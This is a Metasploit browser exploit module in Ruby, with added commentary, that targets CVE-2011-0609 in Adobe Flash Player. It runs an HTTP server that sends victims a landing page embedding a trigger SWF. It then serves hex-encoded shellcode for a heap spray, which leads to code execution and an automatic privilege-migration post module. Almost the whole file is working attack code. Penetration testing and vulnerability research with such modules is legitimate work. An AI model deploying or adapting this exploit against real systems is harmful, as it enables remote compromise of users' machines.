Path: blob/master/modules/exploits/windows/browser/adobe_flashplayer_avm.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Browser exploit module for CVE-2011-0609 (Adobe Flash Player AVM2 bytecode
# verifier). The module serves an HTML page that embeds a pre-built trigger SWF
# read from the framework data directory; the SWF then fetches the hex-encoded
# payload back from this same HTTP server (see on_request_uri). All of the
# Msf::* names below come from the framework, so this file is not runnable on
# its own.
class MetasploitModule < Msf::Exploit::Remote
  # Author-assigned reliability rank (framework constant).
  Rank = GoodRanking

  # HTTP server mixin: supplies the on_request_uri callback, send_response and
  # get_resource (the base URI this module is served from) used below.
  include Msf::Exploit::Remote::HttpServer::HTML

  # Module metadata only (name, description, references, option defaults,
  # payload constraints, single 'Automatic' target). No I/O happens here.
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Adobe Flash Player AVM Bytecode Verification Vulnerability',
      'Description' => %q{
        This module exploits a vulnerability in Adobe Flash Player versions 10.2.152.33
        and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification
        logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same
        vulnerability that was used for the RSA attack in March 2011.

        Specifically, this issue results in uninitialized memory being referenced and later
        executed. Taking advantage of this issue relies on heap spraying and controlling the
        uninitialized memory.

        Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several
        other browsers. DEP does catch the exploit and causes it to fail. Due to the nature
        of the uninitialized memory its fairly difficult to get around this restriction.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'bannedit', # Metasploit version
          'Unknown'   # Malcode version seen used in targeted attacks
        ],
      'References' =>
        [
          ['CVE', '2011-0609'],
          ['OSVDB', '71254'],
          ['URL', 'http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html'],
          ['URL', 'http://www.adobe.com/devnet/swf.html'],
          ['URL', 'http://www.adobe.com/support/security/advisories/apsa11-01.html'],
          ['URL', 'http://www.f-secure.com/weblog/archives/00002226.html'],
        ],
      # HTTP::compression / HTTP::chunked shape the responses sent below;
      # InitialAutoRunScript names a post module run once a session opens.
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'HTTP::compression' => 'gzip',
          'HTTP::chunked' => true,
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
      # Payload is hex-encoded before being served (see on_request_uri), so the
      # only byte the encoder must avoid is NUL.
      'Payload' =>
        {
          'Space' => 1000,
          'BadChars' => "\x00",
          'DisableNops' => true
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Automatic', {}],
        ],
      'DisclosureDate' => '2011-03-15',
      'DefaultTarget' => 0))
  end

  # Loads the pre-built trigger SWF (data/exploits/CVE-2011-0609.swf) into @swf,
  # then defers to the mixin's exploit, which starts the HTTP service.
  #
  # NOTE(review): fd is not closed if read or stat raises; a block form
  # (File.open(path, "rb") { |f| ... }) or File.binread would avoid the leak.
  #
  # @raise [Errno::ENOENT] if the SWF is missing from the data directory
  def exploit
    path = File.join( Msf::Config.data_directory, "exploits", "CVE-2011-0609.swf" )
    fd = File.open( path, "rb" )
    @swf = fd.read(fd.stat.size)
    fd.close

    super
  end

  # Request dispatcher for the HTTP server. Three responses, chosen by URI:
  #   - URI containing ".swf" -> the trigger SWF loaded in #exploit
  #   - URI containing ".txt" -> the encoded payload as ASCII hex (text/plain)
  #   - anything else         -> the HTML page embedding the SWF
  # trigger_file and obj_id are regenerated on every request; since the .swf
  # match is a substring match, the randomized name does not need to persist.
  #
  # @param cli     client connection handed in by the mixin
  # @param request HTTP request object; only request.uri is read
  def on_request_uri(cli, request)
    trigger = @swf
    trigger_file = rand_text_alpha(rand(6)+3) + ".swf"
    # payload.encoded is the already-encoded shellcode; unpack('H*') renders it
    # as one lowercase hex string, which is what the SWF fetches as text.
    shellcode = payload.encoded.unpack('H*')[0]
    obj_id = rand_text_alpha(rand(6)+3)

    if request.uri.match(/\.swf/i)
      print_status("Sending Exploit SWF")
      send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
      return
    end

    # we use a nice trick by having Flash request our shellcode and load it for the heap spray
    # src for the flash file: external/source/exploits/CVE-2011-0609/exploit.as
    # (From a detection standpoint: a text/plain body that is nothing but hex
    # digits, fetched right after an x-shockwave-flash response, is the
    # observable pattern this handler produces.)
    if request.uri.match(/\.txt/i)
      send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })
      return
    end

    # Landing page: classic object/embed pair pointing at the randomized SWF
    # name under this module's resource path.
    html = <<-EOS
<html>
<head>
</head>
<body>
<center>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
id="#{obj_id}" width="600" height="400"
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
<param name="movie" value="#{get_resource}#{trigger_file}" />
<embed src="#{get_resource}#{trigger_file}" quality="high"
width="320" height="300" name="#{obj_id}" align="middle"
allowNetworking="all"
type="application/x-shockwave-flash"
pluginspage="http://www.macromedia.com/go/getflashplayer">
</embed>

</object>
</center>

</body>
</html>
    EOS

    print_status("Sending #{self.name} HTML")
    send_response(cli, html, { 'Content-Type' => 'text/html' })
  end
end